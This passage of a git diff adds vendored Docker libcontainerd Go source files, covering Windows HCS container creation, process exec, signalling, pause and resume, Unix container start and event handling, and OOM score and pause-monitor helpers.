path + if layerOpt == nil || layerOpt.LayerPaths == nil { + return fmt.Errorf("no layer option or paths were supplied to the runtime") + } + + if configuration.HvPartition { + // Find the upper-most utility VM image, since the utility VM does not + // use layering in RS1. + // TODO @swernli/jhowardmsft at some point post RS1 this may be re-locatable. + var uvmImagePath string + for _, path := range layerOpt.LayerPaths { + fullPath := filepath.Join(path, "UtilityVM") + _, err := os.Stat(fullPath) + if err == nil { + uvmImagePath = fullPath + break + } + if !os.IsNotExist(err) { + return err + } + } + if uvmImagePath == "" { + return errors.New("utility VM image could not be found") + } + configuration.HvRuntime = &hcsshim.HvRuntime{ImagePath: uvmImagePath} + } else { + configuration.VolumePath = spec.Root.Path + } + + configuration.LayerFolderPath = layerOpt.LayerFolderPath + + for _, layerPath := range layerOpt.LayerPaths { + _, filename := filepath.Split(layerPath) + g, err := hcsshim.NameToGuid(filename) + if err != nil { + return err + } + configuration.Layers = append(configuration.Layers, hcsshim.Layer{ + ID: g.ToString(), + Path: layerPath, + }) + } + + // Add the mounts (volumes, bind mounts etc) to the structure + mds := make([]hcsshim.MappedDir, len(spec.Mounts)) + for i, mount := range spec.Mounts { + mds[i] = hcsshim.MappedDir{ + HostPath: mount.Source, + ContainerPath: mount.Destination, + ReadOnly: false, + } + for _, o := range mount.Options { + if strings.ToLower(o) == "ro" { + mds[i].ReadOnly = true + } + } + } + configuration.MappedDirectories = mds + + hcsContainer, err := hcsshim.CreateContainer(containerID, configuration) + if err != nil { + return err + } + + // Construct a container object for calling start on it. 
+ container := &container{ + containerCommon: containerCommon{ + process: process{ + processCommon: processCommon{ + containerID: containerID, + client: clnt, + friendlyName: InitFriendlyName, + }, + commandLine: strings.Join(spec.Process.Args, " "), + }, + processes: make(map[string]*process), + }, + ociSpec: spec, + hcsContainer: hcsContainer, + } + + container.options = options + for _, option := range options { + if err := option.Apply(container); err != nil { + logrus.Errorf("libcontainerd: %v", err) + } + } + + // Call start, and if it fails, delete the container from our + // internal structure, start will keep HCS in sync by deleting the + // container there. + logrus.Debugf("libcontainerd: Create() id=%s, Calling start()", containerID) + if err := container.start(attachStdio); err != nil { + clnt.deleteContainer(containerID) + return err + } + + logrus.Debugf("libcontainerd: Create() id=%s completed successfully", containerID) + return nil + +} + +// AddProcess is the handler for adding a process to an already running +// container. It's called through docker exec. It returns the system pid of the +// exec'd process. +func (clnt *client) AddProcess(ctx context.Context, containerID, processFriendlyName string, procToAdd Process, attachStdio StdioCallback) (int, error) { + clnt.lock(containerID) + defer clnt.unlock(containerID) + container, err := clnt.getContainer(containerID) + if err != nil { + return -1, err + } + // Note we always tell HCS to + // create stdout as it's required regardless of '-i' or '-t' options, so that + // docker can always grab the output through logs. We also tell HCS to always + // create stdin, even if it's not used - it will be closed shortly. Stderr + // is only created if it we're not -t. 
+ createProcessParms := hcsshim.ProcessConfig{ + EmulateConsole: procToAdd.Terminal, + CreateStdInPipe: true, + CreateStdOutPipe: true, + CreateStdErrPipe: !procToAdd.Terminal, + } + createProcessParms.ConsoleSize[0] = uint(procToAdd.ConsoleSize.Height) + createProcessParms.ConsoleSize[1] = uint(procToAdd.ConsoleSize.Width) + + // Take working directory from the process to add if it is defined, + // otherwise take from the first process. + if procToAdd.Cwd != "" { + createProcessParms.WorkingDirectory = procToAdd.Cwd + } else { + createProcessParms.WorkingDirectory = container.ociSpec.Process.Cwd + } + + // Configure the environment for the process + createProcessParms.Environment = setupEnvironmentVariables(procToAdd.Env) + createProcessParms.CommandLine = strings.Join(procToAdd.Args, " ") + createProcessParms.User = procToAdd.User.Username + + logrus.Debugf("libcontainerd: commandLine: %s", createProcessParms.CommandLine) + + // Start the command running in the container. + var stdout, stderr io.ReadCloser + var stdin io.WriteCloser + newProcess, err := container.hcsContainer.CreateProcess(&createProcessParms) + if err != nil { + logrus.Errorf("libcontainerd: AddProcess(%s) CreateProcess() failed %s", containerID, err) + return -1, err + } + + pid := newProcess.Pid() + + stdin, stdout, stderr, err = newProcess.Stdio() + if err != nil { + logrus.Errorf("libcontainerd: %s getting std pipes failed %s", containerID, err) + return -1, err + } + + iopipe := &IOPipe{Terminal: procToAdd.Terminal} + iopipe.Stdin = createStdInCloser(stdin, newProcess) + + // Convert io.ReadClosers to io.Readers + if stdout != nil { + iopipe.Stdout = ioutil.NopCloser(&autoClosingReader{ReadCloser: stdout}) + } + if stderr != nil { + iopipe.Stderr = ioutil.NopCloser(&autoClosingReader{ReadCloser: stderr}) + } + + proc := &process{ + processCommon: processCommon{ + containerID: containerID, + friendlyName: processFriendlyName, + client: clnt, + systemPid: uint32(pid), + }, + commandLine: 
createProcessParms.CommandLine, + hcsProcess: newProcess, + } + + // Add the process to the container's list of processes + container.processes[processFriendlyName] = proc + + // Tell the engine to attach streams back to the client + if err := attachStdio(*iopipe); err != nil { + return -1, err + } + + // Spin up a go routine waiting for exit to handle cleanup + go container.waitExit(proc, false) + + return pid, nil +} + +// Signal handles `docker stop` on Windows. While Linux has support for +// the full range of signals, signals aren't really implemented on Windows. +// We fake supporting regular stop and -9 to force kill. +func (clnt *client) Signal(containerID string, sig int) error { + var ( + cont *container + err error + ) + + // Get the container as we need it to get the container handle. + clnt.lock(containerID) + defer clnt.unlock(containerID) + if cont, err = clnt.getContainer(containerID); err != nil { + return err + } + + cont.manualStopRequested = true + + logrus.Debugf("libcontainerd: Signal() containerID=%s sig=%d pid=%d", containerID, sig, cont.systemPid) + + if syscall.Signal(sig) == syscall.SIGKILL { + // Terminate the compute system + if err := cont.hcsContainer.Terminate(); err != nil { + if !hcsshim.IsPending(err) { + logrus.Errorf("libcontainerd: failed to terminate %s - %q", containerID, err) + } + } + } else { + // Terminate Process + if err := cont.hcsProcess.Kill(); err != nil && !hcsshim.IsAlreadyStopped(err) { + // ignore errors + logrus.Warnf("libcontainerd: failed to terminate pid %d in %s: %q", cont.systemPid, containerID, err) + } + } + + return nil +} + +// While Linux has support for the full range of signals, signals aren't really implemented on Windows. +// We try to terminate the specified process whatever signal is requested. 
+func (clnt *client) SignalProcess(containerID string, processFriendlyName string, sig int) error { + clnt.lock(containerID) + defer clnt.unlock(containerID) + cont, err := clnt.getContainer(containerID) + if err != nil { + return err + } + + for _, p := range cont.processes { + if p.friendlyName == processFriendlyName { + return p.hcsProcess.Kill() + } + } + + return fmt.Errorf("SignalProcess could not find process %s in %s", processFriendlyName, containerID) +} + +// Resize handles a CLI event to resize an interactive docker run or docker exec +// window. +func (clnt *client) Resize(containerID, processFriendlyName string, width, height int) error { + // Get the libcontainerd container object + clnt.lock(containerID) + defer clnt.unlock(containerID) + cont, err := clnt.getContainer(containerID) + if err != nil { + return err + } + + h, w := uint16(height), uint16(width) + + if processFriendlyName == InitFriendlyName { + logrus.Debugln("libcontainerd: resizing systemPID in", containerID, cont.process.systemPid) + return cont.process.hcsProcess.ResizeConsole(w, h) + } + + for _, p := range cont.processes { + if p.friendlyName == processFriendlyName { + logrus.Debugln("libcontainerd: resizing exec'd process", containerID, p.systemPid) + return p.hcsProcess.ResizeConsole(w, h) + } + } + + return fmt.Errorf("Resize could not find containerID %s to resize", containerID) + +} + +// Pause handles pause requests for containers +func (clnt *client) Pause(containerID string) error { + unlockContainer := true + // Get the libcontainerd container object + clnt.lock(containerID) + defer func() { + if unlockContainer { + clnt.unlock(containerID) + } + }() + container, err := clnt.getContainer(containerID) + if err != nil { + return err + } + + for _, option := range container.options { + if h, ok := option.(*HyperVIsolationOption); ok { + if !h.IsHyperV { + return errors.New("cannot pause Windows Server Containers") + } + break + } + } + + err = container.hcsContainer.Pause() + 
if err != nil { + return err + } + + // Unlock container before calling back into the daemon + unlockContainer = false + clnt.unlock(containerID) + + return clnt.backend.StateChanged(containerID, StateInfo{ + CommonStateInfo: CommonStateInfo{ + State: StatePause, + }}) +} + +// Resume handles resume requests for containers +func (clnt *client) Resume(containerID string) error { + unlockContainer := true + // Get the libcontainerd container object + clnt.lock(containerID) + defer func() { + if unlockContainer { + clnt.unlock(containerID) + } + }() + container, err := clnt.getContainer(containerID) + if err != nil { + return err + } + + // This should never happen, since Windows Server Containers cannot be paused + for _, option := range container.options { + if h, ok := option.(*HyperVIsolationOption); ok { + if !h.IsHyperV { + return errors.New("cannot resume Windows Server Containers") + } + break + } + } + + err = container.hcsContainer.Resume() + if err != nil { + return err + } + + // Unlock container before calling back into the daemon + unlockContainer = false + clnt.unlock(containerID) + + return clnt.backend.StateChanged(containerID, StateInfo{ + CommonStateInfo: CommonStateInfo{ + State: StateResume, + }}) +} + +// Stats handles stats requests for containers +func (clnt *client) Stats(containerID string) (*Stats, error) { + // Get the libcontainerd container object + clnt.lock(containerID) + defer clnt.unlock(containerID) + container, err := clnt.getContainer(containerID) + if err != nil { + return nil, err + } + s, err := container.hcsContainer.Statistics() + if err != nil { + return nil, err + } + st := Stats(s) + return &st, nil +} + +// Restore is the handler for restoring a container +func (clnt *client) Restore(containerID string, _ StdioCallback, unusedOnWindows ...CreateOption) error { + // TODO Windows: Implement this. For now, just tell the backend the container exited. 
+ logrus.Debugf("libcontainerd: Restore(%s)", containerID) + return clnt.backend.StateChanged(containerID, StateInfo{ + CommonStateInfo: CommonStateInfo{ + State: StateExit, + ExitCode: 1 << 31, + }}) +} + +// GetPidsForContainer returns a list of process IDs running in a container. +// Although implemented, this is not used in Windows. +func (clnt *client) GetPidsForContainer(containerID string) ([]int, error) { + var pids []int + clnt.lock(containerID) + defer clnt.unlock(containerID) + cont, err := clnt.getContainer(containerID) + if err != nil { + return nil, err + } + + // Add the first process + pids = append(pids, int(cont.containerCommon.systemPid)) + // And add all the exec'd processes + for _, p := range cont.processes { + pids = append(pids, int(p.processCommon.systemPid)) + } + return pids, nil +} + +// Summary returns a summary of the processes running in a container. +// This is present in Windows to support docker top. In linux, the +// engine shells out to ps to get process information. On Windows, as +// the containers could be Hyper-V containers, they would not be +// visible on the container host. However, libcontainerd does have +// that information. +func (clnt *client) Summary(containerID string) ([]Summary, error) { + + // Get the libcontainerd container object + clnt.lock(containerID) + defer clnt.unlock(containerID) + container, err := clnt.getContainer(containerID) + if err != nil { + return nil, err + } + p, err := container.hcsContainer.ProcessList() + if err != nil { + return nil, err + } + pl := make([]Summary, len(p)) + for i := range p { + pl[i] = Summary(p[i]) + } + return pl, nil +} + +// UpdateResources updates resources for a running container. 
+func (clnt *client) UpdateResources(containerID string, resources Resources) error { + // Updating resource isn't supported on Windows + // but we should return nil for enabling updating container + return nil +} + +func (clnt *client) CreateCheckpoint(containerID string, checkpointID string, checkpointDir string, exit bool) error { + return errors.New("Windows: Containers do not support checkpoints") +} + +func (clnt *client) DeleteCheckpoint(containerID string, checkpointID string, checkpointDir string) error { + return errors.New("Windows: Containers do not support checkpoints") +} + +func (clnt *client) ListCheckpoints(containerID string, checkpointDir string) (*Checkpoints, error) { + return nil, errors.New("Windows: Containers do not support checkpoints") +} + +func (clnt *client) GetServerVersion(ctx context.Context) (*ServerVersion, error) { + return &ServerVersion{}, nil +} diff --git a/vendor/github.com/docker/docker/libcontainerd/container.go b/vendor/github.com/docker/docker/libcontainerd/container.go new file mode 100644 index 0000000000..b40321389a --- /dev/null +++ b/vendor/github.com/docker/docker/libcontainerd/container.go @@ -0,0 +1,13 @@ +package libcontainerd + +const ( + // InitFriendlyName is the name given in the lookup map of processes + // for the first process started in a container. 
+ InitFriendlyName = "init" + configFilename = "config.json" +) + +type containerCommon struct { + process + processes map[string]*process +} diff --git a/vendor/github.com/docker/docker/libcontainerd/container_unix.go b/vendor/github.com/docker/docker/libcontainerd/container_unix.go new file mode 100644 index 0000000000..61bab145f2 --- /dev/null +++ b/vendor/github.com/docker/docker/libcontainerd/container_unix.go @@ -0,0 +1,250 @@ +// +build linux solaris + +package libcontainerd + +import ( + "encoding/json" + "io" + "io/ioutil" + "os" + "path/filepath" + "sync" + "syscall" + "time" + + "github.com/Sirupsen/logrus" + containerd "github.com/docker/containerd/api/grpc/types" + "github.com/docker/docker/pkg/ioutils" + specs "github.com/opencontainers/runtime-spec/specs-go" + "github.com/tonistiigi/fifo" + "golang.org/x/net/context" +) + +type container struct { + containerCommon + + // Platform specific fields are below here. + pauseMonitor + oom bool + runtime string + runtimeArgs []string +} + +type runtime struct { + path string + args []string +} + +// WithRuntime sets the runtime to be used for the created container +func WithRuntime(path string, args []string) CreateOption { + return runtime{path, args} +} + +func (rt runtime) Apply(p interface{}) error { + if pr, ok := p.(*container); ok { + pr.runtime = rt.path + pr.runtimeArgs = rt.args + } + return nil +} + +func (ctr *container) clean() error { + if os.Getenv("LIBCONTAINERD_NOCLEAN") == "1" { + return nil + } + if _, err := os.Lstat(ctr.dir); err != nil { + if os.IsNotExist(err) { + return nil + } + return err + } + + if err := os.RemoveAll(ctr.dir); err != nil { + return err + } + return nil +} + +// cleanProcess removes the fifos used by an additional process. +// Caller needs to lock container ID before calling this method. 
+func (ctr *container) cleanProcess(id string) { + if p, ok := ctr.processes[id]; ok { + for _, i := range []int{syscall.Stdin, syscall.Stdout, syscall.Stderr} { + if err := os.Remove(p.fifo(i)); err != nil && !os.IsNotExist(err) { + logrus.Warnf("libcontainerd: failed to remove %v for process %v: %v", p.fifo(i), id, err) + } + } + } + delete(ctr.processes, id) +} + +func (ctr *container) spec() (*specs.Spec, error) { + var spec specs.Spec + dt, err := ioutil.ReadFile(filepath.Join(ctr.dir, configFilename)) + if err != nil { + return nil, err + } + if err := json.Unmarshal(dt, &spec); err != nil { + return nil, err + } + return &spec, nil +} + +func (ctr *container) start(checkpoint string, checkpointDir string, attachStdio StdioCallback) (err error) { + spec, err := ctr.spec() + if err != nil { + return nil + } + + ctx, cancel := context.WithCancel(context.Background()) + defer cancel() + ready := make(chan struct{}) + + fifoCtx, cancel := context.WithCancel(context.Background()) + defer func() { + if err != nil { + cancel() + } + }() + + iopipe, err := ctr.openFifos(fifoCtx, spec.Process.Terminal) + if err != nil { + return err + } + + var stdinOnce sync.Once + + // we need to delay stdin closure after container start or else "stdin close" + // event will be rejected by containerd. 
+ // stdin closure happens in attachStdio + stdin := iopipe.Stdin + iopipe.Stdin = ioutils.NewWriteCloserWrapper(stdin, func() error { + var err error + stdinOnce.Do(func() { // on error from attach we don't know if stdin was already closed + err = stdin.Close() + go func() { + select { + case <-ready: + case <-ctx.Done(): + } + select { + case <-ready: + if err := ctr.sendCloseStdin(); err != nil { + logrus.Warnf("failed to close stdin: %+v", err) + } + default: + } + }() + }) + return err + }) + + r := &containerd.CreateContainerRequest{ + Id: ctr.containerID, + BundlePath: ctr.dir, + Stdin: ctr.fifo(syscall.Stdin), + Stdout: ctr.fifo(syscall.Stdout), + Stderr: ctr.fifo(syscall.Stderr), + Checkpoint: checkpoint, + CheckpointDir: checkpointDir, + // check to see if we are running in ramdisk to disable pivot root + NoPivotRoot: os.Getenv("DOCKER_RAMDISK") != "", + Runtime: ctr.runtime, + RuntimeArgs: ctr.runtimeArgs, + } + ctr.client.appendContainer(ctr) + + if err := attachStdio(*iopipe); err != nil { + ctr.closeFifos(iopipe) + return err + } + + resp, err := ctr.client.remote.apiClient.CreateContainer(context.Background(), r) + if err != nil { + ctr.closeFifos(iopipe) + return err + } + ctr.systemPid = systemPid(resp.Container) + close(ready) + + return ctr.client.backend.StateChanged(ctr.containerID, StateInfo{ + CommonStateInfo: CommonStateInfo{ + State: StateStart, + Pid: ctr.systemPid, + }}) +} + +func (ctr *container) newProcess(friendlyName string) *process { + return &process{ + dir: ctr.dir, + processCommon: processCommon{ + containerID: ctr.containerID, + friendlyName: friendlyName, + client: ctr.client, + }, + } +} + +func (ctr *container) handleEvent(e *containerd.Event) error { + ctr.client.lock(ctr.containerID) + defer ctr.client.unlock(ctr.containerID) + switch e.Type { + case StateExit, StatePause, StateResume, StateOOM: + st := StateInfo{ + CommonStateInfo: CommonStateInfo{ + State: e.Type, + ExitCode: e.Status, + }, + OOMKilled: e.Type == 
StateExit && ctr.oom, + } + if e.Type == StateOOM { + ctr.oom = true + } + if e.Type == StateExit && e.Pid != InitFriendlyName { + st.ProcessID = e.Pid + st.State = StateExitProcess + } + + // Remove process from list if we have exited + switch st.State { + case StateExit: + ctr.clean() + ctr.client.deleteContainer(e.Id) + case StateExitProcess: + ctr.cleanProcess(st.ProcessID) + } + ctr.client.q.append(e.Id, func() { + if err := ctr.client.backend.StateChanged(e.Id, st); err != nil { + logrus.Errorf("libcontainerd: backend.StateChanged(): %v", err) + } + if e.Type == StatePause || e.Type == StateResume { + ctr.pauseMonitor.handle(e.Type) + } + if e.Type == StateExit { + if en := ctr.client.getExitNotifier(e.Id); en != nil { + en.close() + } + } + }) + + default: + logrus.Debugf("libcontainerd: event unhandled: %+v", e) + } + return nil +} + +// discardFifos attempts to fully read the container fifos to unblock processes +// that may be blocked on the writer side. +func (ctr *container) discardFifos() { + ctx, _ := context.WithTimeout(context.Background(), 3*time.Second) + for _, i := range []int{syscall.Stdout, syscall.Stderr} { + f, err := fifo.OpenFifo(ctx, ctr.fifo(i), syscall.O_RDONLY|syscall.O_NONBLOCK, 0) + if err != nil { + logrus.Warnf("error opening fifo %v for discarding: %+v", f, err) + continue + } + go func() { + io.Copy(ioutil.Discard, f) + }() + } +} diff --git a/vendor/github.com/docker/docker/libcontainerd/container_windows.go b/vendor/github.com/docker/docker/libcontainerd/container_windows.go new file mode 100644 index 0000000000..9b1965099a --- /dev/null +++ b/vendor/github.com/docker/docker/libcontainerd/container_windows.go @@ -0,0 +1,311 @@ +package libcontainerd + +import ( + "fmt" + "io" + "io/ioutil" + "strings" + "syscall" + "time" + + "github.com/Microsoft/hcsshim" + "github.com/Sirupsen/logrus" + "github.com/opencontainers/runtime-spec/specs-go" +) + +type container struct { + containerCommon + + // Platform specific fields are below 
here. There are none presently on Windows. + options []CreateOption + + // The ociSpec is required, as client.Create() needs a spec, + // but can be called from the RestartManager context which does not + // otherwise have access to the Spec + ociSpec specs.Spec + + manualStopRequested bool + hcsContainer hcsshim.Container +} + +func (ctr *container) newProcess(friendlyName string) *process { + return &process{ + processCommon: processCommon{ + containerID: ctr.containerID, + friendlyName: friendlyName, + client: ctr.client, + }, + } +} + +// start starts a created container. +// Caller needs to lock container ID before calling this method. +func (ctr *container) start(attachStdio StdioCallback) error { + var err error + isServicing := false + + for _, option := range ctr.options { + if s, ok := option.(*ServicingOption); ok && s.IsServicing { + isServicing = true + } + } + + // Start the container. If this is a servicing container, this call will block + // until the container is done with the servicing execution. + logrus.Debugln("libcontainerd: starting container ", ctr.containerID) + if err = ctr.hcsContainer.Start(); err != nil { + logrus.Errorf("libcontainerd: failed to start container: %s", err) + if err := ctr.terminate(); err != nil { + logrus.Errorf("libcontainerd: failed to cleanup after a failed Start. %s", err) + } else { + logrus.Debugln("libcontainerd: cleaned up after failed Start by calling Terminate") + } + return err + } + + // Note we always tell HCS to + // create stdout as it's required regardless of '-i' or '-t' options, so that + // docker can always grab the output through logs. We also tell HCS to always + // create stdin, even if it's not used - it will be closed shortly. Stderr + // is only created if it we're not -t. 
+ createProcessParms := &hcsshim.ProcessConfig{ + EmulateConsole: ctr.ociSpec.Process.Terminal, + WorkingDirectory: ctr.ociSpec.Process.Cwd, + CreateStdInPipe: !isServicing, + CreateStdOutPipe: !isServicing, + CreateStdErrPipe: !ctr.ociSpec.Process.Terminal && !isServicing, + } + createProcessParms.ConsoleSize[0] = uint(ctr.ociSpec.Process.ConsoleSize.Height) + createProcessParms.ConsoleSize[1] = uint(ctr.ociSpec.Process.ConsoleSize.Width) + + // Configure the environment for the process + createProcessParms.Environment = setupEnvironmentVariables(ctr.ociSpec.Process.Env) + createProcessParms.CommandLine = strings.Join(ctr.ociSpec.Process.Args, " ") + createProcessParms.User = ctr.ociSpec.Process.User.Username + + // Start the command running in the container. + newProcess, err := ctr.hcsContainer.CreateProcess(createProcessParms) + if err != nil { + logrus.Errorf("libcontainerd: CreateProcess() failed %s", err) + if err := ctr.terminate(); err != nil { + logrus.Errorf("libcontainerd: failed to cleanup after a failed CreateProcess. %s", err) + } else { + logrus.Debugln("libcontainerd: cleaned up after failed CreateProcess by calling Terminate") + } + return err + } + + pid := newProcess.Pid() + + // Save the hcs Process and PID + ctr.process.friendlyName = InitFriendlyName + ctr.process.hcsProcess = newProcess + + // If this is a servicing container, wait on the process synchronously here and + // if it succeeds, wait for it cleanly shutdown and merge into the parent container. 
+ if isServicing { + exitCode := ctr.waitProcessExitCode(&ctr.process) + + if exitCode != 0 { + if err := ctr.terminate(); err != nil { + logrus.Warnf("libcontainerd: terminating servicing container %s failed: %s", ctr.containerID, err) + } + return fmt.Errorf("libcontainerd: servicing container %s returned non-zero exit code %d", ctr.containerID, exitCode) + } + + return ctr.hcsContainer.WaitTimeout(time.Minute * 5) + } + + var stdout, stderr io.ReadCloser + var stdin io.WriteCloser + stdin, stdout, stderr, err = newProcess.Stdio() + if err != nil { + logrus.Errorf("libcontainerd: failed to get stdio pipes: %s", err) + if err := ctr.terminate(); err != nil { + logrus.Errorf("libcontainerd: failed to cleanup after a failed Stdio. %s", err) + } + return err + } + + iopipe := &IOPipe{Terminal: ctr.ociSpec.Process.Terminal} + + iopipe.Stdin = createStdInCloser(stdin, newProcess) + + // Convert io.ReadClosers to io.Readers + if stdout != nil { + iopipe.Stdout = ioutil.NopCloser(&autoClosingReader{ReadCloser: stdout}) + } + if stderr != nil { + iopipe.Stderr = ioutil.NopCloser(&autoClosingReader{ReadCloser: stderr}) + } + + // Save the PID + logrus.Debugf("libcontainerd: process started - PID %d", pid) + ctr.systemPid = uint32(pid) + + // Spin up a go routine waiting for exit to handle cleanup + go ctr.waitExit(&ctr.process, true) + + ctr.client.appendContainer(ctr) + + if err := attachStdio(*iopipe); err != nil { + // OK to return the error here, as waitExit will handle tear-down in HCS + return err + } + + // Tell the docker engine that the container has started. + si := StateInfo{ + CommonStateInfo: CommonStateInfo{ + State: StateStart, + Pid: ctr.systemPid, // Not sure this is needed? Double-check monitor.go in daemon BUGBUG @jhowardmsft + }} + logrus.Debugf("libcontainerd: start() completed OK, %+v", si) + return ctr.client.backend.StateChanged(ctr.containerID, si) + +} + +// waitProcessExitCode will wait for the given process to exit and return its error code. 
+func (ctr *container) waitProcessExitCode(process *process) int { + // Block indefinitely for the process to exit. + err := process.hcsProcess.Wait() + if err != nil { + if herr, ok := err.(*hcsshim.ProcessError); ok && herr.Err != syscall.ERROR_BROKEN_PIPE { + logrus.Warnf("libcontainerd: Wait() failed (container may have been killed): %s", err) + } + // Fall through here, do not return. This ensures we attempt to continue the + // shutdown in HCS and tell the docker engine that the process/container + // has exited to avoid a container being dropped on the floor. + } + + exitCode, err := process.hcsProcess.ExitCode() + if err != nil { + if herr, ok := err.(*hcsshim.ProcessError); ok && herr.Err != syscall.ERROR_BROKEN_PIPE { + logrus.Warnf("libcontainerd: unable to get exit code from container %s", ctr.containerID) + } + // Since we got an error retrieving the exit code, make sure that the code we return + // doesn't incorrectly indicate success. + exitCode = -1 + + // Fall through here, do not return. This ensures we attempt to continue the + // shutdown in HCS and tell the docker engine that the process/container + // has exited to avoid a container being dropped on the floor. + } + + return exitCode +} + +// waitExit runs as a goroutine waiting for the process to exit. It's +// equivalent to (in the linux containerd world) where events come in for +// state change notifications from containerd. 
+func (ctr *container) waitExit(process *process, isFirstProcessToStart bool) error { + logrus.Debugln("libcontainerd: waitExit() on pid", process.systemPid) + + exitCode := ctr.waitProcessExitCode(process) + // Lock the container while shutting down + ctr.client.lock(ctr.containerID) + + // Assume the container has exited + si := StateInfo{ + CommonStateInfo: CommonStateInfo{ + State: StateExit, + ExitCode: uint32(exitCode), + Pid: process.systemPid, + ProcessID: process.friendlyName, + }, + UpdatePending: false, + } + + // But it could have been an exec'd process which exited + if !isFirstProcessToStart { + si.State = StateExitProcess + ctr.cleanProcess(process.friendlyName) + } else { + updatePending, err := ctr.hcsContainer.HasPendingUpdates() + if err != nil { + logrus.Warnf("libcontainerd: HasPendingUpdates() failed (container may have been killed): %s", err) + } else { + si.UpdatePending = updatePending + } + + logrus.Debugf("libcontainerd: shutting down container %s", ctr.containerID) + if err := ctr.shutdown(); err != nil { + logrus.Debugf("libcontainerd: failed to shutdown container %s", ctr.containerID) + } else { + logrus.Debugf("libcontainerd: completed shutting down container %s", ctr.containerID) + } + if err := ctr.hcsContainer.Close(); err != nil { + logrus.Error(err) + } + + // Remove process from list if we have exited + if si.State == StateExit { + ctr.client.deleteContainer(ctr.containerID) + } + } + + if err := process.hcsProcess.Close(); err != nil { + logrus.Errorf("libcontainerd: hcsProcess.Close(): %v", err) + } + + // Unlock here before we call back into the daemon to update state + ctr.client.unlock(ctr.containerID) + + // Call into the backend to notify it of the state change. 
+ logrus.Debugf("libcontainerd: waitExit() calling backend.StateChanged %+v", si) + if err := ctr.client.backend.StateChanged(ctr.containerID, si); err != nil { + logrus.Error(err) + } + + logrus.Debugf("libcontainerd: waitExit() completed OK, %+v", si) + + return nil +} + +// cleanProcess removes process from the map. +// Caller needs to lock container ID before calling this method. +func (ctr *container) cleanProcess(id string) { + delete(ctr.processes, id) +} + +// shutdown shuts down the container in HCS +// Caller needs to lock container ID before calling this method. +func (ctr *container) shutdown() error { + const shutdownTimeout = time.Minute * 5 + err := ctr.hcsContainer.Shutdown() + if hcsshim.IsPending(err) { + // Explicit timeout to avoid a (remote) possibility that shutdown hangs indefinitely. + err = ctr.hcsContainer.WaitTimeout(shutdownTimeout) + } else if hcsshim.IsAlreadyStopped(err) { + err = nil + } + + if err != nil { + logrus.Debugf("libcontainerd: error shutting down container %s %v calling terminate", ctr.containerID, err) + if err := ctr.terminate(); err != nil { + return err + } + return err + } + + return nil +} + +// terminate terminates the container in HCS +// Caller needs to lock container ID before calling this method. 
+func (ctr *container) terminate() error { + const terminateTimeout = time.Minute * 5 + err := ctr.hcsContainer.Terminate() + + if hcsshim.IsPending(err) { + err = ctr.hcsContainer.WaitTimeout(terminateTimeout) + } else if hcsshim.IsAlreadyStopped(err) { + err = nil + } + + if err != nil { + logrus.Debugf("libcontainerd: error terminating container %s %v", ctr.containerID, err) + return err + } + + return nil +} diff --git a/vendor/github.com/docker/docker/libcontainerd/oom_linux.go b/vendor/github.com/docker/docker/libcontainerd/oom_linux.go new file mode 100644 index 0000000000..e126b7a550 --- /dev/null +++ b/vendor/github.com/docker/docker/libcontainerd/oom_linux.go @@ -0,0 +1,31 @@ +package libcontainerd + +import ( + "fmt" + "os" + "strconv" + + "github.com/Sirupsen/logrus" + "github.com/opencontainers/runc/libcontainer/system" +) + +func setOOMScore(pid, score int) error { + oomScoreAdjPath := fmt.Sprintf("/proc/%d/oom_score_adj", pid) + f, err := os.OpenFile(oomScoreAdjPath, os.O_WRONLY, 0) + if err != nil { + return err + } + stringScore := strconv.Itoa(score) + _, err = f.WriteString(stringScore) + f.Close() + if os.IsPermission(err) { + // Setting oom_score_adj does not work in an + // unprivileged container. Ignore the error, but log + // it if we appear not to be in that situation. 
+ if !system.RunningInUserNS() { + logrus.Debugf("Permission denied writing %q to %s", stringScore, oomScoreAdjPath) + } + return nil + } + return err +} diff --git a/vendor/github.com/docker/docker/libcontainerd/oom_solaris.go b/vendor/github.com/docker/docker/libcontainerd/oom_solaris.go new file mode 100644 index 0000000000..2ebe5e87cf --- /dev/null +++ b/vendor/github.com/docker/docker/libcontainerd/oom_solaris.go @@ -0,0 +1,5 @@ +package libcontainerd + +func setOOMScore(pid, score int) error { + return nil +} diff --git a/vendor/github.com/docker/docker/libcontainerd/pausemonitor_unix.go b/vendor/github.com/docker/docker/libcontainerd/pausemonitor_unix.go new file mode 100644 index 0000000000..4f3766d95c --- /dev/null +++ b/vendor/github.com/docker/docker/libcontainerd/pausemonitor_unix.go @@ -0,0 +1,42 @@ +// +build !windows + +package libcontainerd + +import ( + "sync" +) + +// pauseMonitor is helper to get notifications from pause state changes. +type pauseMonitor struct { + sync.Mutex + waiters map[string][]chan struct{} +} + +func (m *pauseMonitor) handle(t string) { + m.Lock() + defer m.Unlock() + if m.waiters == nil { + return + } + q, ok := m.waiters[t] + if !ok { + return + } + if len(q) > 0 { + close(q[0]) + m.waiters[t] = q[1:] + } +} + +func (m *pauseMonitor) append(t string, waiter chan struct{}) { + m.Lock() + defer m.Unlock() + if m.waiters == nil { + m.waiters = make(map[string][]chan struct{}) + } + _, ok := m.waiters[t] + if !ok { + m.waiters[t] = make([]chan struct{}, 0) + } + m.waiters[t] = append(m.waiters[t], waiter) +} diff --git a/vendor/github.com/docker/docker/libcontainerd/process.go b/vendor/github.com/docker/docker/libcontainerd/process.go new file mode 100644 index 0000000000..57562c8789 --- /dev/null +++ b/vendor/github.com/docker/docker/libcontainerd/process.go @@ -0,0 +1,18 @@ +package libcontainerd + +// processCommon are the platform common fields as part of the process structure +// which keeps the state for the main 
container process, as well as any exec +// processes. +type processCommon struct { + client *client + + // containerID is the Container ID + containerID string + + // friendlyName is an identifier for the process (or `InitFriendlyName` + // for the first process) + friendlyName string + + // systemPid is the PID of the main container process + systemPid uint32 +} diff --git a/vendor/github.com/docker/docker/libcontainerd/process_unix.go b/vendor/github.com/docker/docker/libcontainerd/process_unix.go new file mode 100644 index 0000000000..506fca6e11 --- /dev/null +++ b/vendor/github.com/docker/docker/libcontainerd/process_unix.go @@ -0,0 +1,107 @@ +// +build linux solaris + +package libcontainerd + +import ( + "io" + "io/ioutil" + "os" + "path/filepath" + goruntime "runtime" + "strings" + + containerd "github.com/docker/containerd/api/grpc/types" + "github.com/tonistiigi/fifo" + "golang.org/x/net/context" + "golang.org/x/sys/unix" +) + +var fdNames = map[int]string{ + unix.Stdin: "stdin", + unix.Stdout: "stdout", + unix.Stderr: "stderr", +} + +// process keeps the state for both main container process and exec process. +type process struct { + processCommon + + // Platform specific fields are below here. 
